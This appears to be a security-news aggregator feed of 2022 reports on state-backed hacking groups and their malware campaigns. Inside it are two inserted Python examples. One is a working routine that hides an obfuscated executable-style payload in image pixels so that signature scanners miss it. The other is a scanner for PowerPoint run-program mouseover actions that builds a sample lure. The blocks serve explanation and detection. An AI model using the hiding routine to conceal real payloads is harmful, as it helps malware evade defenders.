The StrongPity APT group targeted Android users with a trojanized version of the Telegram app served through a website impersonating a video chat service called Shagle. ESET researchers reported that StrongPity APT group targeted Android...Security Affairs
January 9, 2023
Russia-linked Cold River APT targeted US nuclear research laboratories Full Text
Abstract
Russia-linked Cold River APT targeted three nuclear research laboratories in the United States in the summer of 2022, Reuters reported. Reuters reported that the Russia-linked APT group Cold River (aka Calisto) targeted three nuclear research laboratories...Security Affairs
December 27, 2022
Lazarus APT Uses Phishing Domains to Target NFT Investors Full Text
Abstract
Lazarus Group is believed to be behind a massive phishing campaign targeting NFT investors via nearly 500 phishing domains. They use fake bait websites to offer malicious Mints. The attack begins by sending out spam emails laden with links to phishing pages that look legitimate.Cyware
December 20, 2022
UAC-0142 APT targets Ukraine’s Delta military intelligence program Full Text
Abstract
Ukraine’s CERT-UA revealed the national Delta military intelligence program has been targeted with a malware-based attack. On December 17, 2022, the Center for Innovations and Development of Defense Technologies of the Ministry of Defense of Ukraine...Security Affairs
December 20, 2022
Russia-linked Gamaredon APT targeted a petroleum refining company in a NATO nation in August Full Text
Abstract
Russia-linked Gamaredon APT group targeted a large petroleum refining company in a NATO state this year amid the invasion of Ukraine. The Russia-linked Gamaredon APT group (aka Shuckworm, Actinium, Armageddon, Primitive Bear, UAC-0010, and Trident...Security Affairs
December 15, 2022
Chinese MirrorFace APT group targets Japanese political entities Full Text
Abstract
A Chinese-speaking APT group, tracked as MirrorFace, is behind a spear-phishing campaign targeting Japanese political entities. ESET researchers recently discovered a spear-phishing campaign targeting Japanese political entities and attributed it to the Chinese-speaking...Security Affairs
December 11, 2022
MuddyWater APT group is back with updated TTPs Full Text
Abstract
The Iran-linked MuddyWater APT is targeting countries in the Middle East as well as Central and West Asia in a new campaign. Deep Instinct’s Threat Research team uncovered a new campaign conducted by the MuddyWater APT (aka SeedWorm, TEMP.Zagros,...Security Affairs
December 9, 2022
Iranian APT Targets US With Drokbk Spyware via GitHub Full Text
Abstract
A subgroup of the state-backed Iranian threat actor Cobalt Mirage is using a new custom malware dubbed "Drokbk" to attack a variety of US organizations, using GitHub as a "dead-drop resolver."Cyware
December 8, 2022
APT37 used Internet Explorer Zero-Day in a recent campaign Full Text
Abstract
Google warns that the North Korea-linked APT37 group is exploiting an Internet Explorer zero-day flaw to spread malware. North Korea-linked APT37 group (aka ScarCruft, Reaper, and Group123) actively exploited an Internet Explorer zero-day vulnerability,...Security Affairs
December 5, 2022
Lazarus APT uses fake cryptocurrency apps to spread AppleJeus Malware Full Text
Abstract
The North Korea-linked Lazarus APT spreads fake cryptocurrency apps under the fake brand BloxHolder to install the AppleJeus malware. Volexity researchers warn of a new malware campaign conducted by the North Korea-linked Lazarus APT against cryptocurrency...Security Affairs
December 1, 2022
North Korea ScarCruft APT used previously undetected Dolphin Backdoor against South Korea Full Text
Abstract
North Korea-linked ScarCruft group used a previously undocumented backdoor called Dolphin against targets in South Korea. ESET researchers discovered a previously undocumented backdoor called Dolphin that was employed by North...Security Affairs
November 30, 2022
China-linked UNC4191 APT relies on USB Devices in attacks against entities in the Philippines Full Text
Abstract
An alleged China-linked cyberespionage group, tracked as UNC4191, used USB devices in attacks aimed at Philippine entities. Mandiant researchers spotted an alleged China-linked cyberespionage group, tracked as UNC4191, leveraging USB devices as attack...Security Affairs
November 18, 2022
China-linked Mustang Panda APT Targets Governments Worldwide via Spear-Phishing Attacks Full Text
Abstract
Earth Preta abused fake Google accounts to distribute malware via spear-phishing emails, initially stored in an archive file (such as rar/zip/jar) and distributed through Google Drive links.Trend Micro
November 16, 2022
Lazarus APT uses DTrack backdoor in attacks against LATAM and European orgs Full Text
Abstract
North Korea-linked Lazarus APT is using a new version of the DTrack backdoor in attacks aimed at organizations in Europe and Latin America. North Korea-linked APT Lazarus is using a new version of the DTrack backdoor to attack organizations in Europe...Security Affairs
November 16, 2022
Chinese APT Targets Government and Defense Agencies in Asia Full Text
Abstract
According to Symantec researchers, Billbug targeted a digital certificate authority, as well as government agencies and defense organizations in several countries in Asia in the latest campaign.Cyware Alerts - Hacker News
November 15, 2022
China-linked APT Billbug breached a certificate authority in Asia Full Text
Abstract
A suspected China-linked APT group breached a digital certificate authority in Asia as part of a campaign aimed at government agencies since March 2022. State-sponsored actors compromised a digital certificate authority in a country in Asia as part...Security Affairs
November 15, 2022
Previously undetected Earth Longzhi APT group is a subgroup of APT41 Full Text
Abstract
Trend Micro reported that the Earth Longzhi group, a previously undocumented subgroup of APT41, targets Ukraine and Asian Countries. Early this year, Trend Micro investigated a security breach suffered by a company in Taiwan. Threat actors employed...Security Affairs
November 14, 2022
New “Earth Longzhi” APT Targets Ukraine and Asian Countries with Custom Cobalt Strike Loaders Full Text
Abstract
Entities located in East and Southeast Asia as well as Ukraine have been targeted at least since 2020 by a previously undocumented subgroup of APT41 , a prolific Chinese advanced persistent threat (APT). Cybersecurity firm Trend Micro, which christened the espionage crew Earth Longzhi , said the actor's long-running campaign can be split into two based on the toolset deployed to attack its victims. The first wave from May 2020 to February 2021 is said to have targeted government, infrastructure, and healthcare industries in Taiwan and the banking sector in China, whereas the succeeding set of intrusions from August 2021 to June 2022 infiltrated high-profile victims in Ukraine and several countries in Asia. This included defense, aviation, insurance, and urban development industries in Taiwan, China, Thailand, Malaysia, Indonesia, Pakistan, and Ukraine. The victimology patterns and the targeted sectors overlap with attacks mounted by a distinct sister group of APT41 (akaThe Hacker News
November 11, 2022
Russia-linked IRIDIUM APT linked to Prestige ransomware attacks against Ukraine Full Text
Abstract
Microsoft linked Prestige ransomware attacks against organizations in Ukraine and Poland to Russia-linked threat actors. In mid-October, Microsoft Threat Intelligence Center (MSTIC) researchers uncovered previously undetected ransomware, tracked as Prestige...Security Affairs
November 10, 2022
APT41’s New Subgroup Earth Longzhi Targets East and Southeast Asia Full Text
Abstract
Both campaigns by the group used spear-phishing emails as the primary entry vector to deliver its malware. It embeds the malware in a password-protected archive or shares a link to download it, luring the victim with information about a person.Trend Micro
November 10, 2022
APT29 abused the Windows Credential Roaming in an attack against a diplomatic entity Full Text
Abstract
Russia-linked APT29 cyberespionage group exploited a Windows feature called Credential Roaming to target a European diplomatic entity. Mandiant researchers in early 2022 responded to an incident where the Russia-linked APT29 group (aka SVR group, Cozy...Security Affairs
November 09, 2022
APT29 Exploited a Windows Feature to Compromise European Diplomatic Entity Network Full Text
Abstract
The Russia-linked APT29 nation-state actor has been found leveraging a "lesser-known" Windows feature called Credential Roaming as part of its attack against an unnamed European diplomatic entity. "The diplomatic-centric targeting is consistent with Russian strategic priorities as well as historic APT29 targeting," Mandiant researcher Thibault Van Geluwe de Berlaere said in a technical write-up. APT29, a Russian espionage group also called Cozy Bear, Iron Hemlock, and The Dukes, is known for its intrusions aimed at collecting intelligence that align with the country's strategic objectives. It's believed to be sponsored by the Foreign Intelligence Service (SVR). Some of the adversarial collective's cyber activities are tracked publicly under the moniker Nobelium , a threat cluster responsible for the widespread supply chain compromise through SolarWinds software in December 2020. The Google-owned threat intelligence and incident response firm sThe Hacker News
November 8, 2022
APT36 Targets Indian Government Employees with Limepad Full Text
Abstract
A new malware campaign by Pakistan-linked Transparent Tribe was found targeting Indian government entities with trojanized strains of a 2FA solution, named Kavach. APT-36 has registered several domains spoofing Indian government organization sites to launch credential harvesting and phishing attack...Cyware Alerts - Hacker News
November 3, 2022
APT10 Targets Japan with New LODEINFO Backdoor Variant Full Text
Abstract
Chinese hacking group Cicada, aka APT10, was found abusing antivirus software to deploy a new variant of the LODEINFO malware against Japanese organizations. LODEINFO operators have been updating the malware very frequently and continuously, to make it leaner and more efficient. Through LODEINFO, A...Cyware Alerts - Hacker News
November 03, 2022
OPERA1ER APT Hackers Targeted Dozens of Financial Organizations in Africa Full Text
Abstract
A French-speaking threat actor dubbed OPERA1ER has been linked to a series of more than 30 successful cyber attacks aimed at banks, financial services, and telecom companies across Africa, Asia, and Latin America between 2018 and 2022. According to Singapore-headquartered cybersecurity company Group-IB, the attacks have led to thefts totaling $11 million, with actual damages estimated to be as high as $30 million. Some of the more recent attacks in 2021 and 2022 have singled out five different banks in Burkina Faso, Benin, Ivory Coast, and Senegal. Many of the victims identified are said to have been compromised twice, and their infrastructure subsequently weaponized to strike other organizations. OPERA1ER, also known by the names DESKTOP-GROUP, Common Raven, and NXSMS, is known to be active since 2016, operating with the goal of conducting financially motivated heists and exfiltration of documents for further use in spear-phishing attacks. "OPERA1ER often operates duringThe Hacker News
October 28, 2022
Kimsuky APT Adds New Android Malware to its Arsenal Full Text
Abstract
As per the findings by S2W’s threat research and intelligence center, the three new malware, FastFire, FastViewer, and FastSpy, are masquerading as APKs for three utility tools on Google Play Store.Cyware Alerts - Hacker News
October 25, 2022
SideWinder APT Uses New WarHawk Backdoor Against Pakistan Full Text
Abstract
Nation-state actor SideWinder compromised the official website of the National Electric Power Regulatory Authority (NEPRA) to deliver a tailored malware called WarHawk. Multiple malicious modules in WarHawk deliver Cobalt Strike, including new TTPs such as KernelCallBackTable injection and checking...Cyware Alerts - Hacker News
October 24, 2022
SideWinder APT Using New WarHawk Backdoor to Target Entities in Pakistan Full Text
Abstract
SideWinder, a prolific nation-state actor mainly known for targeting Pakistan military entities, compromised the official website of the National Electric Power Regulatory Authority (NEPRA) to deliver a tailored malware called WarHawk . "The newly discovered WarHawk backdoor contains various malicious modules that deliver Cobalt Strike, incorporating new TTPs such as KernelCallBackTable injection and Pakistan Standard Time zone check in order to ensure a victorious campaign," Zscaler ThreatLabz said . The threat group, also called APT-C-17, Rattlesnake, and Razor Tiger, is suspected to be an Indian state-sponsored group, although a report from Kaspersky earlier this May acknowledged that previous indicators that led to the attribution have since disappeared, making it challenging to link the threat cluster to a specific nation. More than 1,000 attacks are said to have been launched by the group since April 2020, an indication of SideWinder's newfound aggressionThe Hacker News
October 18, 2022
China-linked APT41 group targets Hong Kong with Spyder Loader Full Text
Abstract
China-linked threat actors APT41 (a.k.a. Winnti) targeted organizations in Hong Kong, in some cases remaining undetected for a year. Symantec researchers reported that cyberespionage group APT41 targeted organizations in Hong Kong in a campaign that...Security Affairs
October 14, 2022
WIP19, a new Chinese APT targets IT Service Providers and Telcos Full Text
Abstract
Chinese-speaking threat actor, tracked as WIP19, is targeting telecommunications and IT service providers in the Middle East and Asia. SentinelOne researchers uncovered a new threat cluster, tracked as WIP19, which has been targeting telecommunications...Security Affairs
October 13, 2022
China-linked Budworm APT returns to target a US entity Full Text
Abstract
The Budworm espionage group resurfaced targeting a U.S.-based organization for the first time, Symantec Threat Hunter team reported. The Budworm cyber espionage group (aka APT27, Bronze Union, Emissary Panda, Lucky Mouse, TG-3390, and Red Phoenix)...Security Affairs
October 13, 2022
POLONIUM APT targets Israel with a new custom backdoor dubbed PapaCreep Full Text
Abstract
An APT group tracked as Polonium has employed custom backdoors in attacks aimed at Israeli entities since at least September 2021. POLONIUM APT focused only on Israeli targets, launching attacks against more than a dozen organizations in various industries,...Security Affairs
October 13, 2022
New Chinese APT Targets IT Service Providers and Telcos with Signed Malware Full Text
Abstract
As the toolset itself appears to be shared among several actors, it is unclear whether this is a new iteration of operation “Shadow Force” or simply a different actor utilizing similar TTPs.Sentinel One
October 7, 2022
APT Groups Target U.S. Government Agencies with CovalentStealer Full Text
Abstract
The U.S. government alerted against state-backed hackers using the custom CovalentStealer malware and Impacket framework to steal confidential information from a Defense Industrial Base organization. To gain initial access through the victim’s network, the attackers attempted to exploit ProxyLogon...Cyware Alerts - Hacker News
October 4, 2022
Lazarus APT employed an exploit in a Dell firmware driver in recent attacks Full Text
Abstract
North Korea-linked Lazarus APT has been spotted deploying a Windows rootkit by taking advantage of an exploit in a Dell firmware driver. The North Korea-backed Lazarus Group has been observed deploying a Windows rootkit by relying on an exploit in a Dell...Security Affairs
October 4, 2022
Linux Cheerscrypt ransomware is linked to Chinese DEV-0401 APT group Full Text
Abstract
Researchers link recently discovered Linux ransomware Cheerscrypt to the China-linked cyberespionage group DEV-0401. Researchers at cybersecurity firm Sygnia attributed the recently discovered Linux ransomware Cheerscrypt to the China-linked cyber...Security Affairs
October 4, 2022
SolarMarker APT Returns in a New Watering Hole Attack Full Text
Abstract
Digital adversaries behind the SolarMarker malware crippled a global tax consulting firm by camouflaging fake Chrome browser updates as part of watering hole attacks. Threat actors use the Google Dorking technique and conduct source code searches to identify such vulnerable websites before injectin...Cyware Alerts - Hacker News
September 30, 2022
Witchetty APT used steganography in attacks against Middle East entities Full Text
Abstract
A cyberespionage group, tracked as Witchetty, used steganography to hide a previously undocumented backdoor in a Windows logo. Broadcom's Symantec Threat Hunter Team observed a threat actor, tracked as Witchetty, using steganography to hide a previously...Security Affairs
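The point of the Witchetty technique above is that a payload carried inside an ordinary image does not appear as a contiguous byte string anywhere in the file, so a content signature for the payload never matches the carrier. The following is an added illustration, not Witchetty's code or Symantec's analysis: it hides an XOR-obfuscated blob in the least-significant bit of each pixel byte of a constructed 64x64 pixel buffer and recovers it. The carrier, payload, key and the 4-byte length prefix are all assumptions made for the example; the real sample's encoding and key are not described on this page.

```python
"""Added example: LSB steganography in a pixel buffer, and why a payload signature misses it."""
import struct


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR (constructed obfuscation layer; the real key/scheme is unknown here)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def embed_lsb(carrier: bytes, payload: bytes) -> bytes:
    """Write a 4-byte length prefix plus payload into bit 0 of successive carrier bytes."""
    data = struct.pack("<I", len(payload)) + payload
    nbits = len(data) * 8
    if nbits > len(carrier):
        raise ValueError(f"carrier holds {len(carrier) // 8} bytes, payload needs {len(data)}")
    out = bytearray(carrier)
    for i in range(nbits):
        bit = (data[i >> 3] >> (7 - (i & 7))) & 1   # MSB-first within each payload byte
        out[i] = (out[i] & 0xFE) | bit               # only the lowest bit of the pixel changes
    return bytes(out)


def extract_lsb(carrier: bytes) -> bytes:
    """Reverse of embed_lsb: read the length prefix, then that many bytes from bit 0."""
    def read_bytes(bit_offset: int, nbytes: int) -> bytes:
        buf = bytearray(nbytes)
        for i in range(nbytes * 8):
            buf[i >> 3] |= (carrier[bit_offset + i] & 1) << (7 - (i & 7))
        return bytes(buf)

    if len(carrier) < 32:
        raise ValueError("carrier too small to hold a length prefix")
    (length,) = struct.unpack("<I", read_bytes(0, 4))
    if 32 + length * 8 > len(carrier):
        raise ValueError("length prefix exceeds carrier: not an LSB container, or corrupted")
    return read_bytes(32, length)


def make_carrier(width: int = 64, height: int = 64) -> bytes:
    """Constructed 24-bit pixel data (a smooth gradient); in a real BMP this follows the header."""
    px = bytearray()
    for y in range(height):
        for x in range(width):
            px += bytes(((x * 4) & 0xFF, (y * 4) & 0xFF, ((x + y) * 2) & 0xFF))
    return bytes(px)


def demo() -> dict:
    """Embed, recover, and report the properties a defender cares about."""
    payload = b"MZ\x90\x00" + b"constructed stand-in for an encrypted backdoor"  # constructed
    key = b"k3y"                                                                # constructed
    carrier = make_carrier()
    stego = embed_lsb(carrier, xor_bytes(payload, key))
    recovered = xor_bytes(extract_lsb(stego), key)
    return {
        "same_size": len(stego) == len(carrier),        # file size is unchanged
        "payload_visible": payload in stego,            # no contiguous signature match
        "recovered": recovered == payload,              # the loader still gets the payload back
        "bytes_changed": sum(a != b for a, b in zip(carrier, stego)),
    }


if __name__ == "__main__":
    print(demo())
```

Because the carrier keeps its size and still renders as a normal image, the useful checks are on the other side of the chain: a known-good hash of the logo the loader expects, and a process that opens an image file, reads it fully and then allocates executable memory.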
September 28, 2022
APT28 relies on PowerPoint Mouseover to deliver Graphite malware Full Text
Abstract
The Russia-linked APT28 group is using mouse movement in decoy Microsoft PowerPoint documents to distribute malware. The Russia-linked APT28 employed a technique relying on mouse movement in decoy Microsoft PowerPoint documents to deploy malware,...Security Affairs
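The mouseover trick above works because a PowerPoint hyperlink can carry a "run program" action: the slide XML holds an `a:hlinkMouseOver` (or `a:hlinkClick`) element whose `action` attribute is `ppaction://program`, and the slide's relationships file holds the command line as the link target. A .pptx is a ZIP of XML parts, so this can be checked without opening the file in Office. The scanner below is an added example, not APT28's document or the original analysis; the sample document it builds is constructed here, with a harmless `cmd.exe /c echo` command standing in for the real lure's payload.

```python
"""Added example: scan a .pptx (ZIP of OOXML parts) for run-program hyperlink actions."""
import io
import re
import zipfile
from xml.etree import ElementTree as ET

NS_A = "http://schemas.openxmlformats.org/drawingml/2006/main"
NS_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
NS_PKG = "http://schemas.openxmlformats.org/package/2006/relationships"
PROGRAM_ACTION = "ppaction://program"          # the "Run program" hyperlink action
SLIDE_RE = re.compile(r"^ppt/slides/slide\d+\.xml$")


def _relationships(z: zipfile.ZipFile, slide_name: str) -> dict:
    """Map rId -> Target for one slide (ppt/slides/slideN.xml -> ppt/slides/_rels/slideN.xml.rels)."""
    folder, base = slide_name.rsplit("/", 1)
    rels_name = f"{folder}/_rels/{base}.rels"
    if rels_name not in z.namelist():
        return {}
    root = ET.fromstring(z.read(rels_name))
    return {r.get("Id"): r.get("Target", "") for r in root.iter(f"{{{NS_PKG}}}Relationship")}


def find_program_actions(pptx_bytes: bytes) -> list:
    """Return one finding per click/mouseover hyperlink whose action launches a program."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(pptx_bytes)) as z:
        for name in z.namelist():
            if not SLIDE_RE.match(name):
                continue
            rels = _relationships(z, name)
            root = ET.fromstring(z.read(name))
            for trigger in ("hlinkClick", "hlinkMouseOver"):
                for el in root.iter(f"{{{NS_A}}}{trigger}"):
                    if el.get("action", "").lower().startswith(PROGRAM_ACTION):
                        rid = el.get(f"{{{NS_R}}}id")
                        findings.append({"slide": name, "trigger": trigger,
                                         "target": rels.get(rid, "")})
    return findings


def build_sample_pptx(action: str = PROGRAM_ACTION,
                      target: str = "cmd.exe /c echo constructed-sample") -> bytes:
    """Constructed minimal .pptx: one slide, one picture with a mouseover hyperlink action."""
    slide = (f'<p:sld xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" '
             f'xmlns:a="{NS_A}" xmlns:r="{NS_R}"><p:cSld><p:spTree>'
             f'<p:pic><p:nvPicPr><p:cNvPr id="2" name="Picture 1">'
             f'<a:hlinkMouseOver r:id="rId2" action="{action}"/>'
             f'</p:cNvPr></p:nvPicPr></p:pic></p:spTree></p:cSld></p:sld>')
    rels = (f'<Relationships xmlns="{NS_PKG}">'
            f'<Relationship Id="rId2" Type="{NS_R}/hyperlink" '
            f'Target="{target}" TargetMode="External"/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("ppt/slides/slide1.xml", slide)
        z.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for hit in find_program_actions(build_sample_pptx()):
        print(f"{hit['slide']}: {hit['trigger']} runs {hit['target']!r}")
```

Run it over mail attachments or a sandbox's dropped files; any `ppaction://program` hit is worth a look regardless of the command, since legitimate decks almost never launch external programs, and a mouseover trigger in particular needs no click from the victim.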
September 26, 2022
China-linked TA413 group targets Tibetan entities with new backdoor Full Text
Abstract
China-linked cyberespionage group TA413 employs a never-before-seen backdoor called LOWZERO in attacks aimed at Tibetan entities. A China-linked cyberespionage group, tracked as TA413 (aka LuckyCat), is exploiting recently disclosed...Security Affairs
September 26, 2022
Metador, a never-before-seen APT targeted ISPs and telco for about 2 years Full Text
Abstract
A previously undetected hacking group, tracked as Metador, has been targeting telecommunications companies, internet service providers (ISPs), and universities for about two years. SentinelLabs researchers uncovered a never-before-seen threat actor, tracked...Security Affairs
September 23, 2022
Researchers Uncover New Metador APT Targeting Telcos, ISPs, and Universities Full Text
Abstract
A previously undocumented threat actor of unknown origin has been linked to attacks targeting telecom, internet service providers, and universities across multiple countries in the Middle East and Africa. "The operators are highly aware of operations security, managing carefully segmented infrastructure per victim, and quickly deploying intricate countermeasures in the presence of security solutions," researchers from SentinelOne said in a new report. The cybersecurity firm codenamed the group Metador in reference to a string "I am meta" in one of their malware samples and because of Spanish-language responses from the command-and-control (C2) servers. The threat actor is said to have primarily focused on the development of cross-platform malware in its pursuit of espionage aims. Other hallmarks of the campaign are the limited number of intrusions and long-term access to targets. This includes two different Windows malware platforms called metaMain and MaThe Hacker News
September 20, 2022
Russian Sandworm APT impersonates Ukrainian telcos to deliver malware Full Text
Abstract
Russia-linked APT group Sandworm has been observed impersonating telecommunication providers to target Ukrainian entities with malware. Russia-linked cyberespionage group Sandworm has been observed impersonating telecommunication providers to target...Security Affairs
September 16, 2022
North Korea-linked APT spreads tainted versions of PuTTY via WhatsApp Full Text
Abstract
North Korea-linked threat actor UNC4034 is spreading tainted versions of the PuTTY SSH and Telnet client. In July 2022, Mandiant identified a novel spear phish methodology that was employed by North Korea-linked threat actor UNC4034. The attackers...Security Affairs
September 15, 2022
Russia-linked Gamaredon APT targets Ukraine with a new info-stealer Full Text
Abstract
Russia-linked Gamaredon APT targets employees of the Ukrainian government, defense, and law enforcement agencies with a custom information-stealing malware. Russia-linked Gamaredon APT group (aka Shuckworm, Actinium, Armageddon, Primitive Bear,...Security Affairs
September 15, 2022
Gamaredon APT Targets Ukrainian Government, Defense Agencies in New Campaign Full Text
Abstract
The campaign aims to deliver information-stealing malware to Ukrainian victim machines and makes heavy use of multiple modular PowerShell and VBScript (VBS) scripts as part of the infection chain.Cisco Talos
September 14, 2022
SparklingGoblin APT Hackers Using New Linux Variant of SideWalk Backdoor Full Text
Abstract
A Linux variant of a backdoor known as SideWalk was used to target a Hong Kong university in February 2021, underscoring the cross-platform abilities of the implant. Slovak cybersecurity firm ESET, which detected the malware in the university's network, attributed the backdoor to a nation-state actor dubbed SparklingGoblin . The unnamed university is said to have been already targeted by the group in May 2020 during the student protests . "The group continuously targeted this organization over a long period of time, successfully compromising multiple key servers, including a print server, an email server, and a server used to manage student schedules and course registrations," ESET said in a report shared with The Hacker News. SparklingGoblin is the name given to a Chinese advanced persistent threat (APT) group with connections to the Winnti umbrella (aka APT41, Barium, Earth Baku, or Wicked Panda). It's primarily known for its attacks targeting various enThe Hacker News
September 14, 2022
SparklingGoblin APT adds a new Linux variant of SideWalk implant to its arsenal Full Text
Abstract
China-linked SparklingGoblin APT was spotted using a Linux variant of a backdoor known as SideWalk against a Hong Kong university. Researchers from ESET discovered a Linux variant of the SideWalk backdoor, which is a custom implant used by the China-linked...Security Affairs
September 11, 2022
Iranian APT42 Launched Over 30 Espionage Attacks Against Activists and Dissidents Full Text
Abstract
A state-sponsored advanced persistent threat (APT) actor newly christened APT42 (formerly UNC788) has been attributed to over 30 confirmed espionage attacks against individuals and organizations of strategic interest to the Iranian government at least since 2015. Cybersecurity firm Mandiant said the group operates as the intelligence gathering arm of Iran's Islamic Revolutionary Guard Corps (IRGC), not to mention shares partial overlaps with another cluster called APT35 , which is also known as Charming Kitten, Cobalt Illusion, ITG18, Phosphorus, TA453, and Yellow Garuda. APT42 has exhibited a propensity to strike various industries such as non-profits, education, governments, healthcare, legal, manufacturing, media, and pharmaceuticals spanning at least 14 countries, including in Australia, Europe, the Middle East, and the U.S. Intrusions aimed at the pharmaceutical sector are also notable for the fact that they commenced at the onset of the COVID-19 pandemic in March 2020, iThe Hacker News
September 11, 2022
Iran-linked APT42 is behind over 30 espionage attacks Full Text
Abstract
Iran-linked APT42 (formerly UNC788) is suspected to be the actor behind over 30 cyber espionage attacks against activists and dissidents. Experts attribute over 30 cyber espionage attacks against activists and dissidents to the Iran-linked APT42...Security Affairs
September 10, 2022
China-Linked BRONZE PRESIDENT APT targets Government officials worldwide Full Text
Abstract
China-linked BRONZE PRESIDENT group is targeting government officials in Europe, the Middle East, and South America with PlugX malware. Secureworks researchers reported that China-linked APT group BRONZE PRESIDENT conducted a new campaign aimed at government...Security Affairs
September 8, 2022
North Korea-linked Lazarus APT targets energy providers around the world Full Text
Abstract
North Korea-linked Lazarus APT group is targeting energy providers around the world, including organizations in the US, Canada, and Japan. Talos researchers tracked a campaign, orchestrated by North Korea-linked Lazarus APT group, aimed...Security Affairs
September 7, 2022
New Iran-linked APT42 group deploys Android spyware for cyberespionage Full Text
Abstract
Mandiant has collected enough evidence to determine that APT42 is a state-sponsored threat actor who engages in cyberespionage against individuals and organizations of particular interest to the Iranian government.Mandiant
September 07, 2022
New Iranian hacking group APT42 deploys custom Android spyware Full Text
Abstract
A new Iranian state-sponsored hacking group known as APT42 has been discovered using a custom Android malware to spy on targets of interest.BleepingComputer
August 31, 2022
China-linked APT40 used ScanBox Framework in a long-running espionage campaign Full Text
Abstract
Experts uncovered a cyber espionage campaign conducted by a China-linked APT group and aimed at several entities in the South China Sea. Proofpoint’s Threat Research Team uncovered a cyber espionage campaign targeting entities across the world that...Security Affairs
August 30, 2022
Chinese APT40 Hackers Targeted Australian Manufacturers, Wind Turbine Operators Using ScanBox Malware Full Text
Abstract
In this latest campaign that took place between April and June, the hacking group appeared to focus on global heavy industry manufacturers that conduct maintenance of fleets of wind turbines in the South China Sea.CyberScoop
August 26, 2022
Iran-linked Mercury APT exploited Log4Shell in SysAid Apps for initial access Full Text
Abstract
An Iran-linked Mercury APT group exploited the Log4Shell vulnerability in SysAid applications for initial access to the targeted organizations. The Log4Shell flaw (CVE-2021-44228) made the headlines in December after Chinese security researcher...Security Affairs
August 26, 2022
GoldDragon campaign: North-Korea linked Kimsuky APT adopts victim verification technique Full Text
Abstract
The North Korea-linked Kimsuky APT is behind a new campaign, tracked as GoldDragon, targeting political and diplomatic entities in South Korea in early 2022. Researchers from Kaspersky attribute a series of attacks, tracked as GoldDragon, against...Security Affairs
August 25, 2022
Nobelium APT uses new Post-Compromise malware MagicWeb Full Text
Abstract
Russia-linked APT group Nobelium is behind a new sophisticated post-exploitation malware tracked by Microsoft as MagicWeb. Microsoft security researchers discovered a post-compromise malware, tracked as MagicWeb, which is used by the Russia-linked...Security Affairs
August 19, 2022
Russia-linked Cozy Bear uses evasive techniques to target Microsoft 365 users Full Text
Abstract
Russia-linked APT group Cozy Bear continues to target Microsoft 365 accounts in NATO countries for cyberespionage purposes. Mandiant researchers reported that the Russia-linked Cozy Bear cyberespionage group (aka APT29, CozyDuke, and Nobelium),...Security Affairs
August 19, 2022
Russian APT29 hackers abuse Azure services to hack Microsoft 365 users Full Text
Abstract
The state-backed Russian cyberespionage group Cozy Bear has been particularly prolific in 2022, targeting Microsoft 365 accounts in NATO countries and attempting to access foreign policy information.BleepingComputer
August 18, 2022
China-backed APT41 Hackers Targeted 13 Organisations Worldwide Last Year Full Text
Abstract
The Chinese advanced persistent threat (APT) actor tracked as Winnti (aka APT41) has targeted at least 13 organizations geographically spanning across the U.S, Taiwan, India, Vietnam, and China against the backdrop of four different campaigns in 2021. "The targeted industries included the public sector, manufacturing, healthcare, logistics, hospitality, education, as well as the media and aviation," cybersecurity firm Group-IB said in a report shared with The Hacker News. This also included the attack on Air India that came to light in June 2021 as part of a campaign codenamed ColunmTK . The other three campaigns have been assigned the monikers DelayLinkTK, Mute-Pond, and Gentle-Voice based on the domain names used in the attacks. APT41, also known as Barium, Bronze Atlas, Double Dragon, Wicked Panda, or Winnti, is a prolific Chinese cyber threat group that's known to carry out state-sponsored espionage activity in parallel with financially motivated operatiThe Hacker News
August 18, 2022
APT41 Group: 4 Malicious Campaigns, 13 Victims, New Tools and Techniques Full Text
Abstract
Group-IB researchers emphasize that the group usually used certain servers exclusively to host the Cobalt Strike framework, while they exploited others only for active scanning through Acunetix.Help Net Security
August 18, 2022
Winnti hackers split Cobalt Strike into 154 pieces to evade detection Full Text
Abstract
The Chinese Winnti hacking group, also known as 'APT41' or 'Wicked Spider,' targeted at least 80 organizations last year and successfully breached the networks of at least thirteen.BleepingComputer
August 17, 2022
China-linked RedAlpha behind multi-year credential theft campaign Full Text
Abstract
A China-linked APT group named RedAlpha is behind a long-running mass credential theft campaign aimed at organizations worldwide. Recorded Future researchers attributed a long-running mass credential theft campaign to a Chinese nation-state actor...Security Affairs
August 17, 2022
North Korea-linked APT targets Job Seekers with macOS malware Full Text
Abstract
The North Korea-linked Lazarus Group has been observed targeting job seekers with macOS malware that runs on both Intel and Apple M1 chips. ESET researchers continue to monitor a cyberespionage campaign, tracked as "Operation In(ter)ception," that has been...Security Affairs
August 16, 2022
Russia-linked Gamaredon APT continues to target Ukraine Full Text
Abstract
Russia-linked Gamaredon APT group targets Ukrainian entities with PowerShell info-stealer malware dubbed GammaLoad. Russia-linked Gamaredon APT group (aka Shuckworm, Actinium, Armageddon, Primitive Bear, and Trident Ursa) targets Ukrainian entities...Security Affairs
August 15, 2022
Iron Tiger APT is behind a supply chain attack that employed messaging app MiMi Full Text
Abstract
China-linked threat actors Iron Tiger backdoored a version of the cross-platform messaging app MiMi to infect systems. Trend Micro researchers uncovered a new campaign conducted by a China-linked threat actor Iron Tiger that employed a backdoored...Security Affairs
August 12, 2022
Bitter APT and Transparent Tribe Campaigns on Social Media Full Text
Abstract
Meta recently took down two cyberespionage campaigns across its social media platforms. These campaigns were being operated by Bitter APT and Transparent Tribe threat groups.Cyware Alerts - Hacker News
August 12, 2022
DoNot Team APT Updates its Malware Arsenal Full Text
Abstract
Morphisec Labs researchers have reported that the group has added new modules to its Windows spyware framework aka YTY, Jaca. These latest samples appear to be used in the wild.Cyware Alerts - Hacker News
August 9, 2022
Experts linked Maui ransomware to North Korean Andariel APT Full Text
Abstract
Cybersecurity researchers from Kaspersky linked the Maui ransomware to the North Korea-backed Andariel APT group. Kaspersky linked with medium confidence the Maui ransomware operation to the North Korea-backed APT group Andariel, which is considered...Security Affairs
August 9, 2022
US sanctioned crypto mixer Tornado Cash used by North Korea-linked APT Full Text
Abstract
